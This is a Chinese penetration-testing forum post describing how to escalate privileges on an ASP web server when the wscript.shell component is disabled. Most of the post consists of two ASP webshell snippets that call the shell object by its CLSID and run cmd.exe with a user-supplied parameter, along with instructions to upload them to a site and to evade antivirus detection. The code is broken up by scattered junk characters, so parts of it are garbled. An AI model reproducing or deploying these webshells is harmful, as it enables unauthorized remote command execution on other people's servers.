找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 没有wscript.shell组件提权方法
返回列表 发新帖
查看: 3262|回复: 0
打印 上一主题 下一主题

没有wscript.shell组件提权方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-21 09:08:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  • 可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
    4 g1 T3 ~* J* k1 k0 Q- F
  • 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。" u7 a6 Z4 D1 M+ T, G' B% n, Z, \
  • 要想让运行命令可以试试这种方法,成功率为五五之数。6 E7 X) `5 q. n3 l! t7 n( \6 o9 E
  • 把下面代码复制:) A7 Z# ?# z& E4 R. [) W9 b
  • <%2 n6 G8 U! d; L$ P
  • end if. @; o. i9 @2 H( r7 d
  • response.write(”")/ w# p* f; U# N+ B$ t
  • On Error Resume
    ' _! z4 M2 M  g
  • Next
    . i$ A& Z( h& u" `' p+ C
  • response.write oScriptlhn.exec(”cmd.exe /c” & $ H! W" i' w( n. P
  • request(”c”)).stdout.readall! |9 V0 w( f, p# {- c
  • response.write(”")
    # ?1 t% D# _' n2 {. C6 U: q) J& n
  • response.write(”")1 V; C, z5 D; I' _) H$ E5 w
  • response.write(”
    : @5 U8 A* S0 u  Y1 Z) }" V
  • “)6 d6 J; d( ]/ ^8 [. b! r# p( |% R# f
  • response.write(”")
    0 P; X9 ]; [/ a( Q
  • %>6 C2 g5 H8 e' l8 W1 u# Y
  • 保存为一个asp文件,然后传到网站目录上去
    $ ^7 M: ]6 L% Z# ~" t
  • 运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
    ) t9 ^* `7 v0 T9 W6 W# t! S
  • 我用此成功运行过cacls命令。
    # n5 w* R) n5 g' k/ M6 ~  R/ x; \
  • 第二那就是运行时出错,可能限制某些代码执行. r1 M. p& a, Y1 y
  • 无wscript.shell组件提权又一个方法
    / ]# k7 z# ?& z) `' ], B
  • <object runat=server id=oScriptlhn scope=page 0 D* K% a9 }$ A- b, ]7 e

  • 9 t9 m  Q$ e% P+ a
  • classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>; {) U4 @# x9 j
  • <%if err then%> / T# f' w* ^, U5 r7 i
  • <object runat=server id=oScriptlhn scope=page / O8 Q7 |0 f" D0 u
  • + x# Y- I+ L9 v/ m
  • classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
    7 D0 [: U# E" q' M& I$ d6 ?
  • <% ( K( y# Z- d$ i) O8 H' r1 P
  • end if 7 }' H0 G& {  c9 `0 f# q" e8 ~
  • response.write(”<textarea readonly cols=80 " d0 E* j( d" V3 X6 a
  • 4 [, S- ?; q. r  A0 [! v3 ?: n2 g
  • rows=20>”) 0 r) ]3 ?( M* o( @( W
  • On Error Resume Next
    2 h% g4 ^  B  L7 O! C/ b3 D) A
  • response.write : @3 s, d2 Y8 o9 b4 M. a( q

  • ( G" g# ?! `! X: w1 v
  • oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall* F% H! K# `, q5 Q
  • response.write(”</textarea>”)
    0 U! o) \2 Q% s7 w
  • response.write(”<form 6 X. u6 ^( @7 u

  • 9 W2 d6 B- r5 j1 R0 n
  • method=’post’>”) 8 d0 O7 N/ K5 q9 S% K! n
  • response.write(”<input type=text name=’c'
    9 |, K1 @/ ^# a- m  L

  • 6 P, ?- C, ]* n, A
  • size=60><br>”)
    8 |" H9 e, S. n# i( f' f  |  \
  • response.write(”<input type=submit
    0 l6 j! s. x2 _9 v

  • ! R; I) z; ?) h8 ^/ I
  • value=’执行’></form>”) " \: {& F2 C5 a
  • %>
    + U) ?+ l" M" ?( }2 M
  • 保存为ASP,此代码可能被杀,请注意免杀。  `2 i2 C4 [* s# e- ^. M! M" O
  • 原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建4 l4 `$ `5 }0 S  h: S
复制代码
request, server, 成功率

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表